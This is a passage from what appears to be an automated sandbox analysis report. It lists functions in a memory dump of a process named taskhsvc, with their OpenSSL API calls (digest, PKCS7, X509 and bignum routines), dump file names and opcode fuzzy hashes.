                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$X_end$X_start$N_copyN_divN_mulN_num_bitsN_rshiftN_set_bitN_set_wordN_ucmp
                                                            • String ID: e
                                                            • API String ID: 1360357366-4024072794
                                                            • Opcode ID: cb8d928f8e80e55de4a38c2c22c3b40131e5695941b88d3a831cb63b953c6b2d
                                                            • Instruction ID: 6f7c025f15830e2ae6a8676f5790671a9dbf9070e2169a30cb23799c843e0cf0
                                                            • Opcode Fuzzy Hash: cb8d928f8e80e55de4a38c2c22c3b40131e5695941b88d3a831cb63b953c6b2d
                                                            • Instruction Fuzzy Hash: 0991E5B06197019FD350EF2AC58065ABBF8BF88748F219D2DE89987B40E735D444CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF82F00 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EVP_MD_CTX_init.LIBEAY32 ref: 6CF82F31
                                                              • Part of subcall function 6CF7B300: X509_ALGOR_get0.LIBEAY32 ref: 6CF7B6D9
                                                              • Part of subcall function 6CF7B300: OBJ_obj2nid.LIBEAY32 ref: 6CF7B6E5
                                                              • Part of subcall function 6CF7B300: BIO_find_type.LIBEAY32 ref: 6CF7B761
                                                              • Part of subcall function 6CF7B300: ERR_put_error.LIBEAY32 ref: 6CF7B793
                                                            • EVP_MD_CTX_cleanup.LIBEAY32 ref: 6CF82F55
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CF82F93
                                                            • memcmp.MSVCRT ref: 6CF82FB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: DigestFinal_exJ_obj2nidO_find_typeR_get0R_put_errorX509_X_cleanupX_initmemcmp
                                                            • String ID: O$k$u
                                                            • API String ID: 1983237708-2798927928
                                                            • Opcode ID: 3a933091b6bbb2962832b72e119fe1602d5b6b4ab9b4c725f574b4a6c19a360c
                                                            • Instruction ID: a7242642d5df10ec385b4b7b0500d57b26b68ab8fc7746e5231cea9257120d34
                                                            • Opcode Fuzzy Hash: 3a933091b6bbb2962832b72e119fe1602d5b6b4ab9b4c725f574b4a6c19a360c
                                                            • Instruction Fuzzy Hash: 459147B1A097019FD700DF25C98070BBBF0BF85748F16891DE9A88B760D779E949CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6A5E0 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 196COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PKCS7_add_signed_attribute.LIBEAY32 ref: 6CF6A613
                                                            • X509_gmtime_adj.LIBEAY32 ref: 6CF6A63F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6A66F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_errorS7_add_signed_attributeX509_gmtime_adj
                                                            • String ID: 3$A
                                                            • API String ID: 3671222339-694096507
                                                            • Opcode ID: a6ffcbb879bc13f579e609f2e0b97a7a2a52f640731ef5c114a0df3b1f35aaa2
                                                            • Instruction ID: ca34e4884dfab326cc92b4ce8824fc1ac010ff7ee64533487e1ed52e384b2fc3
                                                            • Opcode Fuzzy Hash: a6ffcbb879bc13f579e609f2e0b97a7a2a52f640731ef5c114a0df3b1f35aaa2
                                                            • Instruction Fuzzy Hash: 8071F3B15083109FD700DF6AC58064FFBF4AB89358F01892EEA9887B10D375E949CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF68F10 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PKCS7_new.LIBEAY32 ref: 6CF68F3E
                                                              • Part of subcall function 6CF63470: ASN1_item_new.LIBEAY32 ref: 6CF63485
                                                            • PKCS7_set_type.LIBEAY32 ref: 6CF68F58
                                                              • Part of subcall function 6CF64420: OBJ_nid2obj.LIBEAY32 ref: 6CF6443B
                                                            • PKCS7_free.LIBEAY32 ref: 6CF690C3
                                                            • ERR_put_error.LIBEAY32 ref: 6CF691A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_nid2objN1_item_newR_put_errorS7_freeS7_newS7_set_type
                                                            • String ID: A$h$w$|
                                                            • API String ID: 2814899340-2631548946
                                                            • Opcode ID: 6f0e8836e4292d3286b1bf7ff14af60b3a408105bb2a8af9cb39ad15a6d3162d
                                                            • Instruction ID: 28141623705c8a2fa887e1d03f9facfaa54c2c7912f2fd51282037f84a70b1f0
                                                            • Opcode Fuzzy Hash: 6f0e8836e4292d3286b1bf7ff14af60b3a408105bb2a8af9cb39ad15a6d3162d
                                                            • Instruction Fuzzy Hash: 9B51D5B0509701AFE3009F26C54435BBBF0EF84748F12891DE9D887B50DBBAD588CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF684F0 Relevance: 34.7, APIs: 23, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_cmpJ_nid2objsk_numsk_value
                                                            • String ID:
                                                            • API String ID: 2170567254-0
                                                            • Opcode ID: 77da99486d0596b3da65bf96b865a25f81b75ee52e1b6cbbe4e27c9be3e00215
                                                            • Instruction ID: 8dc1fa05e303f3627b926b15d451dd912cc3dde5ac13fd96bc120940295a4c8a
                                                            • Opcode Fuzzy Hash: 77da99486d0596b3da65bf96b865a25f81b75ee52e1b6cbbe4e27c9be3e00215
                                                            • Instruction Fuzzy Hash: C1910975615B019FDB00DF3AC58065BB7F4BF86358F12592EEAA4C7B00E731E8468B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF44E30 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1675fb61651dd7a3f8791bb17c85c583399602ee136fc56426da05532e6f4a14
                                                            • Instruction ID: def66ed19838262a13d0d7cb60f81c1226ff2f517a9222340e1f8300d8cd2ccc
                                                            • Opcode Fuzzy Hash: 1675fb61651dd7a3f8791bb17c85c583399602ee136fc56426da05532e6f4a14
                                                            • Instruction Fuzzy Hash: E451E6B25083029BE300AF65D14476FBFE0AB84758F12CD2DE8D85BB41D7BAC4488B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF64420 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_set$J_nid2obj$E_newT_new$D_newG_type_newR_put_error
                                                            • String ID: n$p
                                                            • API String ID: 3047261868-484814754
                                                            • Opcode ID: ac65f36de970dd7cd0913b68bf12cb10f6ee5a08edcd8a746e1e895c7b1f56db
                                                            • Instruction ID: 0db1fad455e831aa1c06826cfd4a191bfe77546bccafd745b232d32045d04d4f
                                                            • Opcode Fuzzy Hash: ac65f36de970dd7cd0913b68bf12cb10f6ee5a08edcd8a746e1e895c7b1f56db
                                                            • Instruction Fuzzy Hash: 424116B0209B018FE720EF79D59539ABBF0AF45308F11492DD9918BB50E7B9E448DB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE286D0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
